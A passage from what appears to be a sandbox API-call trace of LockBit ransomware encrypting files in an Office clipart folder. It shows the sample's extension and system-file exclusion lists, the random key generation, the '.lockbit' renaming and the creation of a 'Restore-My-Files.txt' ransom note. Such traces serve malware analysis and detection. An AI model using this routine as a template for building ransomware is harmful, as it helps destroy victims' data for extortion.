[0101.914] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.914] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.914] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.914] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.914] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.914] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.914] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.914] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.914] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.915] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.915] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.915] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.915] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.915] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.915] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.915] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.915] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.915] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.915] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.915] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.915] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.915] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.915] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.915] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.lockbit") returned 72 [0101.915] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0101.916] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.916] malloc (_Size=0x40068) returned 0x3db00b8 [0101.918] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=3378) returned 1 [0101.918] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.919] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0101.919] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.920] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0101.920] ReadFile (in: hFile=0xf00, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0101.927] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.927] malloc (_Size=0xa6) returned 0x77d800 [0101.927] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.927] free (_Block=0x77d800) [0101.927] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.928] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.928] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.928] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e3cb900, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x5eb686b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6e3cb900, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0xc30, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00176_.GIF", cAlternateFileName="")) returned 1 [0101.940] lstrcmpiW (lpString1=".", lpString2="AG00176_.GIF") returned -1 [0101.940] lstrcmpiW (lpString1="..", lpString2="AG00176_.GIF") returned -1 [0101.940] PathFindExtensionW (pszPath="AG00176_.GIF") returned=".GIF" [0101.940] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.940] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.940] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.940] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.940] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.940] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.940] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.940] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.940] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.940] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.940] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.940] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.940] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.940] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.940] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.940] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.940] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.940] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.940] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.940] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.940] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.941] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.941] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.941] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.941] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.941] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.941] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00176_.GIF") returned 1 [0101.942] lstrcmpiW (lpString1="ntldr", lpString2="AG00176_.GIF") returned 1 [0101.942] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00176_.GIF") returned 1 [0101.942] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00176_.GIF") returned 1 [0101.942] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00176_.GIF") returned 1 [0101.942] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00176_.GIF") returned 1 [0101.942] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00176_.GIF") returned 1 [0101.942] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.942] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned=".GIF" [0101.942] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.942] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.942] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.942] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.942] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.942] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.942] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.942] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.942] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.942] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.942] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.942] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.942] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.942] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.942] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.942] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.942] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.942] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.942] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.942] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.943] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.943] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.943] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.943] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.943] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.943] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.943] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.943] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.943] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.lockbit") returned 72 [0101.943] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xcac [0101.944] CreateIoCompletionPort (FileHandle=0xcac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.944] malloc (_Size=0x40068) returned 0x3d70048 [0101.944] GetFileSizeEx (in: hFile=0xcac, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3120) returned 1 [0101.944] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0101.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0101.946] ReadFile (in: hFile=0xcac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0101.949] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.949] malloc (_Size=0xa6) returned 0x77d800 [0101.949] NtSetInformationFile (FileHandle=0xcac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.950] free (_Block=0x77d800) [0101.950] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.950] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.950] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.950] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a5f2300, ftCreationTime.dwHighDateTime=0x1bd4af1, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a5f2300, ftLastWriteTime.dwHighDateTime=0x1bd4af1, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN00010_.WMF", cAlternateFileName="")) returned 1 [0101.950] lstrcmpiW (lpString1=".", lpString2="AN00010_.WMF") returned -1 [0101.950] lstrcmpiW (lpString1="..", lpString2="AN00010_.WMF") returned -1 [0101.950] PathFindExtensionW (pszPath="AN00010_.WMF") returned=".WMF" [0101.950] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0101.950] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0101.950] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0101.950] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0101.950] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0101.950] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0101.950] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0101.950] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0101.950] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0101.951] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0101.951] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0101.952] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN00010_.WMF") returned 1 [0101.953] lstrcmpiW (lpString1="ntldr", lpString2="AN00010_.WMF") returned 1 [0101.953] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN00010_.WMF") returned 1 [0101.953] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN00010_.WMF") returned 1 [0101.953] lstrcmpiW (lpString1="autorun.inf", lpString2="AN00010_.WMF") returned 1 [0101.953] lstrcmpiW (lpString1="thumbs.db", lpString2="AN00010_.WMF") returned 1 [0101.953] lstrcmpiW (lpString1="iconcache.db", lpString2="AN00010_.WMF") returned 1 [0101.953] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.953] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned=".WMF" [0101.953] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0101.953] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0101.953] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0101.953] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0101.953] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0101.953] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0101.953] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0101.953] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0101.953] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0101.953] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0101.953] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0101.953] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0101.954] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0101.954] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.lockbit") returned 72 [0101.954] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xefc [0101.962] CreateIoCompletionPort (FileHandle=0xefc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.962] malloc (_Size=0x40068) returned 0x3ef0008 [0101.962] GetFileSizeEx (in: hFile=0xefc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=3026) returned 1 [0101.962] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.963] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0101.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0101.965] ReadFile (in: hFile=0xefc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.973] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.973] malloc (_Size=0xa6) returned 0x77d800 [0101.973] NtSetInformationFile (FileHandle=0xefc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.974] free (_Block=0x77d800) [0101.974] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.974] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.974] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.974] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab1c4f00, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab1c4f00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN00015_.WMF", cAlternateFileName="")) returned 1 [0101.974] lstrcmpiW (lpString1=".", lpString2="AN00015_.WMF") returned -1 [0101.974] lstrcmpiW (lpString1="..", lpString2="AN00015_.WMF") returned -1 [0101.974] PathFindExtensionW (pszPath="AN00015_.WMF") returned=".WMF" [0101.974] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0101.974] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0101.974] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0101.974] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0101.974] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0101.974] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0101.974] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0101.975] 